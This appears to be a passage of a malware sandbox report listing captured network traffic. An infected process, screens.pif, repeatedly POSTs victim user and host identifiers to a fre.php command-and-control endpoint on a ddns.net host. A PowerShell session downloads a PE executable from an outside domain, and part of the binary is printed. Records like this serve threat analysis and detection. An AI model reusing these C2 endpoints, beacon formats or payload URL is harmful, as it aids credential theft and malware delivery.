Oct 3, 2024 09:22:28.927858114 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:29.580168962 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.10	49798	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:29.741869926 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:29.746973038 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:30.493874073 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.10	49799	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:30.649540901 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:30.654397011 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:31.469435930 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.10	49800	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:31.628278971 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:31.633255959 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:32.287770987 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.10	49801	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:32.754582882 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:32.759509087 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:33.477503061 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.10	49802	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:33.631897926 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:33.636826038 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:34.399502039 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.10	49803	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:34.561244965 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:34.567445993 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:35.265968084 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.10	49804	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:35.407145977 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:35.412081957 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:36.047740936 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.10	49805	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:36.190355062 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:36.196016073 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:36.840380907 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.10	49806	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:36.993830919 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:36.999089003 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:37.715905905 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.10	49807	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:37.864594936 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:37.869566917 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:40.206928015 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.10	49808	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:40.381808996 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:40.386730909 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:41.026272058 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.10	49809	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:41.275152922 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:41.280592918 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:41.948029995 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49706	188.114.97.3	443	7360	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:41 UTC	196	OUT	GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1 Host: www.sodiumlaurethsulfatedesyroyer.com Connection: Keep-Alive
2024-10-03 07:20:41 UTC	668	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:20:41 GMT Content-Type: application/octet-stream Content-Length: 371712 Connection: close Last-Modified: Thu, 03 Oct 2024 07:01:39 GMT ETag: "66fe4153-5ac00" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AymEIG7pQ5XTxJK77NGvv00XIG2ezJfCCwnkysw2tolwFywFd2lLGJHaok3MEQiuGsXIlk%2FDz9mJ2ePL91bAJo%2Br%2B1yHEbZYnQ3sB%2FC44Xs91Aj%2F%2Bq3%2FgkcIMD0sBuwaNs2LsFEBGV0h0V%2BOHdXwFu7ZfhY9rEIV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb2bcaf94d2394-EWR
2024-10-03 07:20:41 UTC	701	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 51 41 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 00 00 00 fc 04 00 00 00 00 00 0a 20 06 00 00 20 05 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQAf @ @`
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 7c 4e ba 89 6a ae b4 5c 4b 64 73 41 42 5e 60 4e 31 ac c5 3b 82 8b 33 e3 a3 8c 99 7b ee 92 49 5f 13 4b 5b c4 ad 38 08 e4 bd 5d 1e f8 18 3a ae 91 8d ac e5 78 b9 1e 15 da 31 fd aa 71 64 b2 f6 61 81 c6 8d 45 a7 04 ad 6d 78 8f f6 ac 2e dc ce e4 d9 46 7d 2c 16 1c a8 0c 94 79 27 85 6b bf 5b 43 4e 3b e5 ac 3c 99 80 ab c3 d1 88 1a 0f 8e 07 c5 3f ba bd 53 60 76 82 cc cb 80 c5 14 2a 46 a6 34 ef 28 63 1b 94 37 0d c1 52 2f 83 30 a2 52 ce e0 37 fa bc d1 15 8d 28 a2 cd 42 c4 f2 a9 d2 51 9f 80 cc 3c 84 66 51 c6 9c 8e af 2a 2d ee 48 3e 91 0b bd 04 77 f7 1f 1e 43 43 61 1d 7f 64 59 1a 7e 33 a6 49 68 92 d0 a3 67 22 b2 0b f6 93 1a 72 04 92 a7 26 18 64 65 81 59 d6 02 05 c2 72 8f 0f 82 c9 27 ea 5e 2f 7c 0f 02 56 08 dd da d5 42 e9 a9 c5 9c 6f eb d4 53 dd 10 6e 50 77 d2 32 b6 a3 Data Ascii: \|Nj\KdsAB^`N1;3{I_K[8]:x1qdaEmx.F},y'k[CN;<?S`vF4(c7R/0R7(BQ<fQ-H>wCCadY~3Ihg"r&deYr'^/\|VBoSnPw2
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 72 46 f2 c3 4d 77 26 40 f9 de 9a 82 e2 71 2b 4d 54 31 f3 8c cb dc 32 b7 a6 30 56 03 ce 23 90 7d cf 5d 64 6c 20 d9 9a 0f 4b 5f 0c 11 bf 84 ab a6 14 e6 a1 74 32 c8 ca d6 c9 c5 42 e7 4a cf 9f 58 6d ce 45 8b ce 24 2c 7c c8 e8 2f 72 f8 35 89 75 f0 f3 f3 dd 22 13 a3 92 b7 8c 97 1c 18 b7 df 8c 83 c1 d0 d2 ca d6 f7 8c 53 b1 fe 8f 32 0e 1e ea 53 3d 35 2b 7a 35 37 9f 8a 78 8d 8a ae 05 fe f9 e9 14 d1 5a a4 82 e0 88 ca 43 71 cf 98 a0 94 f8 4e e2 ec 67 bd 15 62 c6 89 7f f6 b2 27 e5 5e b9 72 3b 17 0f 33 3f f5 12 63 91 ca a9 0b 31 9e 8d 5f af 87 14 03 34 67 a6 b9 35 06 54 63 2e ba 12 8e 40 24 fd 7d fd ce 52 f2 2e 4f f9 1b 92 36 9a ae c6 54 33 ed 62 5b 17 29 e8 66 b7 c2 8e 56 88 e3 89 b9 28 c1 06 a4 a5 19 8a 9b 76 81 6d 86 10 1d 82 a9 71 ac c1 29 5e af f5 c7 0b ce 3f 84 Data Ascii: rFMw&@q+MT120V#}]dl K_t2BJXmE$,\|/r5u"S2S=5+z57xZCqNgb'^r;3?c1_4g5Tc.@$}R.O6T3b[)fV(vmq)^?
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 2f 62 29 13 76 ff 9d e9 2c c1 44 5c 5b df 35 88 e4 1d 8a ae 26 92 3a 01 35 a8 17 3c f7 a4 76 2c 05 74 e5 f5 f8 cf 46 66 df 55 62 8d 7d e2 ef 3b c2 6d 07 ab f1 86 39 34 bb 20 95 c1 4c ba 31 39 8c 46 55 0f 10 42 73 e3 61 c7 29 0d 46 58 d0 b5 ef 72 12 c3 90 99 4b 88 a3 49 af 2a e8 5e 38 64 6a bb 37 67 af 2c 33 2c af 74 d7 3b e2 cc 43 d3 33 a9 28 0e 8d f2 f7 8a 42 59 bd d4 02 c6 6d 2a 74 4f b6 03 57 5e 2e 2c 9b f3 e5 ee 86 a3 31 a4 5d 1d 29 25 bb bf d8 fe f8 37 3e 78 1e 1c be bb 01 d5 75 11 40 a3 bf 7f 14 a0 29 84 6b ec d7 f8 6e bd b3 0b 56 37 47 db 64 05 34 1d fc b0 f7 7e f8 31 0d e1 9d dc f6 e8 17 50 95 40 7c 9c 90 0f c0 d1 3d f2 3d b6 fd 09 8d 7c ae 06 4a e0 70 b6 79 93 8a 6e 22 7c 7d 2b 09 39 71 3d 38 e8 d5 58 37 2d 6d 96 38 df bc 66 3b 5e fa a9 62 6e 6f Data Ascii: /b)v,D\[5&:5<v,tFfUb};m94 L19FUBsa)FXrKI^8dj7g,3,t;C3(BYmtOW^.,1])%7>xu@)knV7Gd4~1P@\|==\|Jpyn"\|}+9q=8X7-m8f;^bno
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 3c 0d 83 91 9b a6 48 5a 9c 7d b1 a1 c3 17 d6 05 d0 42 bd 31 c2 ee ff 6d a4 87 0d 22 36 95 06 76 29 2a 1c e4 dd 15 6b 5e 90 e2 94 3c 58 dc 80 3b 9e e0 e0 da b7 0b 06 c4 f4 84 58 92 c5 dd 98 d9 6c 19 ac 8e 8b 90 38 42 65 73 68 ee 05 6a 26 1a d9 2b f1 f6 68 33 dc 8f 06 2a 1f 5b 25 3d 4d a2 a6 8d 45 58 9a cf 60 95 ae 4d c4 67 79 c4 55 68 e5 6e 4c 3c 5b 72 97 88 dd 86 28 21 97 e5 c1 bb b7 17 2d c3 c2 74 01 ce ba 6b 46 88 0c 48 da 77 ce f0 b7 49 07 d4 f3 27 65 a5 46 63 c4 04 31 c8 d6 45 2d 53 13 c9 3c da 21 d7 b4 eb 56 cd e8 e0 9b 59 7c 7f dd 0c ea 98 51 c3 bd 7c 62 f6 7d a9 07 a2 10 11 f7 bc 90 66 3f cc 81 b5 a8 8e 92 d2 47 34 2d 79 df 2a 77 23 2c 28 4d 4b 0a 27 b9 01 67 70 5b c4 6b 7b 2c d7 6f 11 65 f9 50 c5 ea 5d c2 02 38 93 a8 73 e9 cb a1 54 42 77 0c 43 4f Data Ascii: <HZ}B1m"6v)k^<X;Xl8Beshj&+h3[%=MEX`MgyUhnL<[r(!-tkFHwI'eFc1E-S<!VY\|Q\|b}f?G4-y*w#,(MK'gp[k{,oeP]8sTBwCO
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 82 24 57 07 df c1 5d ea 84 12 26 ad 35 76 bf 1b 31 53 8d 51 84 d5 22 dc bd 19 c0 c9 01 d8 20 3e aa 63 01 e8 c5 ce b4 07 03 56 8b 17 d4 51 e2 da 1d c8 e8 82 c8 fe ec de cb 0a 0f 1d d1 8f de cd c0 79 01 e9 dc 2e 11 bc c7 47 0d 41 7e e9 9b 79 22 d5 be df a1 3b c0 50 87 d9 86 6e 27 ab 14 e7 12 64 f0 dc 9f b6 28 e5 82 cf 49 47 83 dc fb 48 49 02 d9 8f 28 76 67 8c 89 a7 b4 4e 7b 65 8c 63 92 a9 9f 0b 35 5d 54 b0 16 5f e9 55 34 87 fa 61 a6 48 12 8e 4e 86 98 ee 12 30 cb f2 4a 4f a1 04 6a 16 83 99 1f fc db 35 c0 88 b4 cc 57 ae 9b 68 6a 43 a0 b2 53 b8 22 f8 ab 92 75 45 db fd 68 8f a4 12 83 6e 57 31 7e ce f0 5f b4 4d d3 c6 66 5b e5 48 84 c7 f9 f9 b5 96 17 6f 67 33 3a ab 5f dd fe 07 e5 a0 d4 8e f6 55 54 fc 81 c6 52 99 ab 06 c0 1c dd 4f e0 4c d8 48 24 22 2d a0 91 db c6 Data Ascii: $W]&5v1SQ" >cVQy.GA~y";Pn'd(IGHI(vgN{ec5]T_U4aHN0JOj5WhjCS"uEhnW1~_Mf[Hog3:_UTROLH$"-
